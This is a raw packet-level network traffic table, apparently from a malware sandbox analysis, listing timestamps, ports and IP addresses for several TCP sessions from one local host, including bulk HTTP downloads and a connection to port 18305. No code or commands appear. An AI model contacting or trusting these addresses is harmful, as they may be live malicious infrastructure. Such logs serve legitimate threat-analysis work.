Dec 27, 2023 17:57:21.917956114 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.917974949 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.917985916 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.917990923 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918006897 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.918013096 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918040037 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.918047905 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918065071 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.918071032 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918080091 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918092966 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.918131113 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.918139935 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918154001 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918190002 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.918195963 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918207884 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918212891 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.918226004 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.918229103 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918246031 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918261051 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.918292999 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.918302059 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918315887 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918354034 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.918359995 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918370008 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918370962 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.918392897 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918394089 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.918404102 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918447018 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.918457031 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.918459892 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918471098 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918500900 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918514013 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.918523073 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918540955 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918554068 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.918571949 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.918581009 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918591976 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918605089 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918606043 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.918643951 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.918651104 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918663025 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.918663025 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918684006 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918689966 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.918697119 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918719053 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.918744087 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.918751955 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918766975 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918811083 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.918817997 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918828964 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.918828964 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918849945 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918859005 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.918864012 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918886900 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.918900013 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918914080 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918917894 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.918925047 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918943882 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.918967962 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.918972015 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.918978930 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919009924 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.919012070 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919029951 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.919033051 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919045925 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919064999 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.919095993 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919097900 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.919107914 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919117928 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.919131041 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919152975 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.919158936 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919179916 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.919183016 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919198036 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919234037 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.919239998 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919250011 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919264078 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.919272900 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919302940 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.919308901 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919326067 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.919332027 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919346094 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919384003 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.919389963 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919401884 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.919404030 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919426918 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919452906 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.919460058 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919482946 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.919486046 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919502020 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919534922 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.919540882 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919550896 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919553041 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.919570923 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919600964 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.919606924 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919621944 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.919626951 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919641972 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919678926 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.919684887 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919694901 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919709921 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.919713020 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919739008 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.919745922 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919755936 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.919766903 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919779062 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.919780970 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919794083 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919802904 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.919830084 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.919843912 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919861078 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919893026 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.919898033 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919908047 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919909954 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.919924974 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919964075 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.919970036 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919981003 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.919995070 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.919998884 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.920018911 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.920025110 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.920034885 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.920047998 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.920059919 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.920089960 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.920089960 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.920103073 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.920119047 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.920140982 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.920146942 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.920185089 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.920202017 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.921057940 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:22.056835890 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:22.193738937 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:22.193784952 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:22.193803072 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:22.193809986 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:22.402895927 CET	49735	80	192.168.2.4	185.215.113.68
Dec 27, 2023 17:57:22.402935028 CET	49735	80	192.168.2.4	185.215.113.68
Dec 27, 2023 17:57:22.690960884 CET	80	49735	185.215.113.68	192.168.2.4
Dec 27, 2023 17:57:22.691003084 CET	80	49735	185.215.113.68	192.168.2.4
Dec 27, 2023 17:57:22.700146914 CET	80	49735	185.215.113.68	192.168.2.4
Dec 27, 2023 17:57:22.712404966 CET	49735	80	192.168.2.4	185.215.113.68
Dec 27, 2023 17:57:22.712466955 CET	49735	80	192.168.2.4	185.215.113.68
Dec 27, 2023 17:57:23.000202894 CET	80	49735	185.215.113.68	192.168.2.4
Dec 27, 2023 17:57:23.000226974 CET	80	49735	185.215.113.68	192.168.2.4
Dec 27, 2023 17:57:23.009787083 CET	80	49735	185.215.113.68	192.168.2.4
Dec 27, 2023 17:57:23.040838957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:23.058130026 CET	49735	80	192.168.2.4	185.215.113.68
Dec 27, 2023 17:57:23.285119057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.285202980 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:23.285512924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:23.530122042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.530349970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.530427933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.530442953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.530457020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.530472040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.530477047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:23.530492067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.530498028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:23.530509949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.530539036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:23.530569077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.530585051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.530597925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.530615091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:23.530644894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:23.774918079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.774939060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.775005102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:23.783484936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.783502102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.783551931 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:23.800627947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.800645113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.800694942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:23.817734957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.817754984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.817805052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:23.834958076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.835063934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.835146904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:23.852061987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.852082014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.852152109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:23.869106054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.869122028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.869205952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:23.886358976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.886375904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.886444092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:23.903445005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.903464079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.903518915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:23.920478106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.920494080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:23.920566082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.020172119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.020191908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.020277977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.028965950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.028980970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.029027939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.046762943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.046781063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.046880007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.062963963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.062979937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.063036919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.080688953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.080930948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.080986023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.097435951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.097453117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.097520113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.114711046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.114727020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.114835978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.131716967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.131732941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.131798029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.149956942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.149971962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.150024891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.162920952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.162935972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.162991047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.177364111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.177383900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.177438021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.191024065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.191040993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.191095114 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.204627037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.204641104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.204699993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.218391895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.218405962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.218476057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.232341051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.232356071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.232425928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.245831966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.245846987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.245918036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.259391069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.259406090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.259450912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.272979975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.272994995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.273060083 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.283278942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.283305883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.283349991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.290261030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.290275097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.290326118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.299130917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.299145937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.299196005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.308146954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.308161020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.308218956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.316014051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.316028118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.316075087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.325215101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.325228930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.325290918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.336122990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.336138010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.336186886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.341593027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.341615915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.341665983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.350255966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.350270987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.350344896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.358774900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.358789921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.358860970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.367413998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.367429018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.367476940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.375993967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.376009941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.376080990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.384495974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.384522915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.384594917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.392761946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.392781019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.392851114 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.401061058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.401074886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.401141882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.409441948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.409466982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.409548998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.417697906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.417714119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.417768002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.425937891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.425955057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.426016092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.426261902 CET	49739	18305	192.168.2.4	195.20.16.103
Dec 27, 2023 17:57:24.434329987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.434345007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.434402943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.442573071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.442588091 CET	80	49738	5.42.65.125	192.168.2.4
